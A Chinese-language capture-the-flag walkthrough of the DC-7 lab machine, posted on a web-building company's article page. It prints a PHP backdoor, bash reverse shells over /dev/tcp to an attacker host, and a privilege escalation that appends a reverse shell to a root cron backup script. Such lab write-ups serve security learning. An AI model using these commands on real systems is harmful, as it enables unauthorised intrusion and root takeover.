尧图建网站 尧图建网站 YAOTU WEB BUILD 免费咨询
ARTICLE DETAIL

资讯详情

深耕网站建设与建站编程的一线实战洞察。

DC-7 靶机全流程攻略

DC-7 靶机全流程攻略 DC-7 靶机攻略扫描靶机发现http服务跟ssh服务进入网站是之前drupal的cms首页有提示目录爆破找到了登录入口没什么头绪看看提示虽然这个挑战并非技术性很强,但如果你需要诉诸暴力攻击或字典攻击,你很可能不会成功。你要做的就是跳出框框思考。明确指出了暴力破解是行不通的还强调说跳出固有思维来思考这时候注意到在页面的左下方多出了一个DC7user在网上搜索一下这里找到了这个账号的GitHub项目页面而且下面有提示找一下这里有没有有用的信息这个config.php泄露了账号密码数据库名称尝试登录页面怎么都登录不上去那试试之前扫出来的ssh服务端口ssh登录登录成功了查看权限find/-perm-4000-typef2/dev/nullsudo-l查看文件查看这个新邮件文件邮件爆出了一个关键信息root 通过 cron 定时执行 /opt/scripts/backups.sh把数据库 dump 写到你的 home 目录下同时也提到了backups.sh 和 website.sql都看一下也就是说这个backup脚本用pickyouownpassword加密了这个website的压缩包那我们就解密这个压缩包拿到数据库的内容cd~/backups gpg-d--pinentry-mode loopback--passphrasePickYourOwnPassword-owebsite.sql website.sql.gpg在这个文件里找user的密码这完全看不了grep-iuserwebsite.sql|head-20查资料发现没有这么麻烦drupal自带一个shell工具叫做drushbackup脚本里有提到可以用它直接修改用户的密码从而直接实现登录到后台看语法drush|head-30改密码drush user-password admin--password666666去页面登录找到一个上传图片的上传点但是上传不了图片马查资料发现可以安装php插件来创建后门的php页面启用插件创建后门连接蚁剑反弹shell到kali# kali监听nc-lvvp6666# 靶机执行bash-cbash -i /dev/tcp/192.168.200.129/6666 21 01获取完整伪终端python-cimport pty; pty.spawn(/bin/bash)现在是www-data组的用户可以编辑backup脚本往脚本里加入一个反弹shellkali监听echobash -c bash -i /dev/tcp/192.168.200.129/7777 01/opt/scripts/backups.sh等15分钟等脚本执行得到root权限找到flagwww-data组有权限修改backups脚本脚本属于该组然后是root来执行它从而拿到root的shell
返回列表